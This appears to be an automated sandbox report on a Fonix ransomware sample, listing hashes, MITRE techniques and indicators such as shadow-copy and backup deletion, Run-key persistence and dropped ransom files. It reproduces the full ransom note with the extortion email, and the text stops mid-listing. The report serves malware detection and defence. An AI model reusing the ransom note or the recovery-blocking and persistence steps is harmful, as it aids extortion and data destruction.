4ce5dda2c3d39cc6c22058add4b64fbedc20f11ba06768b0a3b959f20c88f5fa

Analysis

max time kernel
254s
max time network
134s
platform
windows7_x64
resource
win7
submitted
12-07-2020 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XINOF.exe
Size

561KB
MD5

ff23cd4f45d231f8af9f23a2e730bee6
SHA1

0eea13dc19ab5de9ec7ffd81ef89bddf5994f6ef
SHA256

4ce5dda2c3d39cc6c22058add4b64fbedc20f11ba06768b0a3b959f20c88f5fa
SHA512

78c90354ca919c7bdce56034b1a432e7c3a0860b9faf9d351f74c50c3a8521c343a29d5c9c8babbedcc741acdc4138dc6e3cdc2c8e337f97ed5b99cf583102e8

Score

10^/10

discovery evasion persistence ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\How To Decrypt Files.hta

Ransom Note

All your files have been encrypted!All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send an email to Thunder@fonix.email The crypter person username : Thunder You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool. You have to 48 hours(2 Day) To contact or paying us After that, you have to Pay Double . What is our decryption guarantee? Before paying you can send us up to 3 test files for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention! Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. Do not pay any money before decrypting the test files. If your decryption, is not done after payment, report the username on website (along with evidence such as transfer id) Regards-FonixTeam

Emails

Thunder@fonix.email

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1296 bcdedit.exe
1776 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1896 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
1296	bcdedit.exe
1776	bcdedit.exe

pid	process
1896	wbadmin.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

XINOF.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\UndoUnprotect.tiff	XINOF.exe
File opened for modification	C:\Users\Admin\Pictures\StepRead.tiff	XINOF.exe

Drops startup file 7 IoCs

Processes:

XINOF.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Cpriv.key	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Decrypt Files.hta	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.txt	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cpriv.key	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Decrypt Files.hta	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Help.txt	XINOF.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1384 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1384	icacls.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops desktop.ini file(s) 64 IoCs

Processes:

XINOF.exe

description	ioc	process
File created	C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Music\desktop.ini	XINOF.exe
File created	C:\Users\Public\Music\desktop.ini	XINOF.exe
File created	C:\Program Files\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini	XINOF.exe
File created	C:\Users\Public\Documents\desktop.ini	XINOF.exe
File created	C:\Users\Public\Libraries\desktop.ini	XINOF.exe
File created	C:\Users\Public\Music\Sample Music\desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Contacts\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Favorites\Links for United States\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Videos\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	XINOF.exe
File created	C:\Users\Public\Recorded TV\desktop.ini	XINOF.exe
File created	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	XINOF.exe
File created	C:\Users\Public\Desktop\desktop.ini	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\Favorites\Links\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	XINOF.exe
File created	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	XINOF.exe
File created	C:\Users\Public\Videos\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	XINOF.exe
File created	C:\Users\Public\Videos\Sample Videos\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Desktop\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Pictures\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V8SX06NR\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	XINOF.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	XINOF.exe
File created	C:\Users\Admin\Downloads\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Favorites\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Links\desktop.ini	XINOF.exe
File created	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	XINOF.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	XINOF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	XINOF.exe
File created	C:\Users\Admin\Searches\desktop.ini	XINOF.exe
File created	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	XINOF.exe
File created	C:\Program Files (x86)\desktop.ini	XINOF.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

label.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exe

description	ioc	process
File opened (read-only)	\??\I:	label.exe
File opened (read-only)	\??\M:	label.exe
File opened (read-only)	\??\Q:	label.exe
File opened (read-only)	\??\D:	label.exe
File opened (read-only)	\??\N:	label.exe
File opened (read-only)	\??\O:	label.exe
File opened (read-only)	\??\P:	label.exe
File opened (read-only)	\??\R:	label.exe
File opened (read-only)	\??\T:	label.exe
File opened (read-only)	\??\V:	label.exe
File opened (read-only)	\??\W:	label.exe
File opened (read-only)	\??\X:	label.exe
File opened (read-only)	\??\F:	label.exe
File opened (read-only)	\??\J:	label.exe
File opened (read-only)	\??\K:	label.exe
File opened (read-only)	\??\A:	label.exe
File opened (read-only)	\??\B:	label.exe
File opened (read-only)	\??\S:	label.exe
File opened (read-only)	\??\Y:	label.exe
File opened (read-only)	\??\Z:	label.exe
File opened (read-only)	\??\E:	label.exe
File opened (read-only)	\??\G:	label.exe
File opened (read-only)	\??\H:	label.exe
File opened (read-only)	\??\L:	label.exe
File opened (read-only)	\??\U:	label.exe

Drops file in Program Files directory 64 IoCs

Processes:

XINOF.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL090.XML	XINOF.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar	XINOF.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sr.dll	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\POLICIES.FDT	XINOF.exe
File created	C:\Program Files\Windows Media Player\Visualizations\Help.txt	XINOF.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png	XINOF.exe
File created	C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.UDT	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR37F.GIF	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\Cpriv.key	XINOF.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\Cpriv.key	XINOF.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\How To Decrypt Files.hta	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\Help.txt	XINOF.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\ACEODEXL.DLL	XINOF.exe
File created	C:\Program Files\Windows Defender\MpOAV.dll	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Thatch.eftx	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\MSOHEV.DLL	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	XINOF.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\How To Decrypt Files.hta	XINOF.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\How To Decrypt Files.hta	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\WWLIB.DLL	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\OUTLWVW.DLL.IDX_DLL	XINOF.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mai\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll	XINOF.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\da.pak	XINOF.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\jsdebuggeride.dll	XINOF.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\ECLIPSE.ELM	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.POC	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\How To Decrypt Files.hta	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Document Themes 14\Composite.thmx	XINOF.exe
File created	C:\Program Files\Common Files\System\MSMAPI\Help.txt	XINOF.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspatializer_plugin.dll	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.POC	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar	XINOF.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\Help.txt	XINOF.exe
File opened for modification	C:\Program Files\Java\jre7\bin\npt.dll	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg	XINOF.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL086.XML	XINOF.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png	XINOF.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us\How To Decrypt Files.hta	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF	XINOF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac	XINOF.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\Help.txt	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\SNEEZE.WAV	XINOF.exe
File created	C:\Program Files (x86)\Adobe\Cpriv.key	XINOF.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar	XINOF.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF	XINOF.exe

Drops file in Windows directory 6 IoCs

Processes:

wbadmin.exeXINOF.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File created	C:\Windows\How To Decrypt Files.hta	XINOF.exe
File created	C:\Windows\Help.txt	XINOF.exe
File created	C:\Windows\Cpriv.key	XINOF.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

316 1228 WerFault.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

388 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

740 vssadmin.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	pid_target	process	target process
316	1228	WerFault.exe

pid	process
388	schtasks.exe

pid	process
740	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 5 IoCs

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_Classes\Local Settings	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

1524 PING.EXE
904 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

mshta.exe

pid process

812 mshta.exe

pid	process
1524	PING.EXE
904	PING.EXE

pid	process
812	mshta.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

XINOF.exeWerFault.exepowershell.exe

pid	process
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
1492	XINOF.exe
316	WerFault.exe
316	WerFault.exe
316	WerFault.exe
316	WerFault.exe
1672	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1156 Explorer.EXE

Suspicious use of AdjustPrivilegeToken 61 IoCs

Processes:

WerFault.exeWMIC.exevssvc.exeExplorer.EXEpowershell.exe

description	pid	process
Token: SeDebugPrivilege	316	WerFault.exe
Token: SeIncreaseQuotaPrivilege	1620	WMIC.exe
Token: SeSecurityPrivilege	1620	WMIC.exe
Token: SeTakeOwnershipPrivilege	1620	WMIC.exe
Token: SeLoadDriverPrivilege	1620	WMIC.exe
Token: SeSystemProfilePrivilege	1620	WMIC.exe
Token: SeSystemtimePrivilege	1620	WMIC.exe
Token: SeProfSingleProcessPrivilege	1620	WMIC.exe
Token: SeIncBasePriorityPrivilege	1620	WMIC.exe
Token: SeCreatePagefilePrivilege	1620	WMIC.exe
Token: SeBackupPrivilege	1620	WMIC.exe
Token: SeRestorePrivilege	1620	WMIC.exe
Token: SeShutdownPrivilege	1620	WMIC.exe
Token: SeDebugPrivilege	1620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1620	WMIC.exe
Token: SeRemoteShutdownPrivilege	1620	WMIC.exe
Token: SeUndockPrivilege	1620	WMIC.exe
Token: SeManageVolumePrivilege	1620	WMIC.exe
Token: 33	1620	WMIC.exe
Token: 34	1620	WMIC.exe
Token: 35	1620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1620	WMIC.exe
Token: SeSecurityPrivilege	1620	WMIC.exe
Token: SeTakeOwnershipPrivilege	1620	WMIC.exe
Token: SeLoadDriverPrivilege	1620	WMIC.exe
Token: SeSystemProfilePrivilege	1620	WMIC.exe
Token: SeSystemtimePrivilege	1620	WMIC.exe
Token: SeProfSingleProcessPrivilege	1620	WMIC.exe
Token: SeIncBasePriorityPrivilege	1620	WMIC.exe
Token: SeCreatePagefilePrivilege	1620	WMIC.exe
Token: SeBackupPrivilege	1620	WMIC.exe
Token: SeRestorePrivilege	1620	WMIC.exe
Token: SeShutdownPrivilege	1620	WMIC.exe
Token: SeDebugPrivilege	1620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1620	WMIC.exe
Token: SeRemoteShutdownPrivilege	1620	WMIC.exe
Token: SeUndockPrivilege	1620	WMIC.exe
Token: SeManageVolumePrivilege	1620	WMIC.exe
Token: 33	1620	WMIC.exe
Token: 34	1620	WMIC.exe
Token: 35	1620	WMIC.exe
Token: SeBackupPrivilege	1040	vssvc.exe
Token: SeRestorePrivilege	1040	vssvc.exe
Token: SeAuditPrivilege	1040	vssvc.exe
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE
Token: SeShutdownPrivilege	1156	Explorer.EXE

Suspicious use of FindShellTrayWindow 46 IoCs

Processes:

Explorer.EXE

pid	process
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE

Suspicious use of SendNotifyMessage 50 IoCs

Processes:

Explorer.EXE

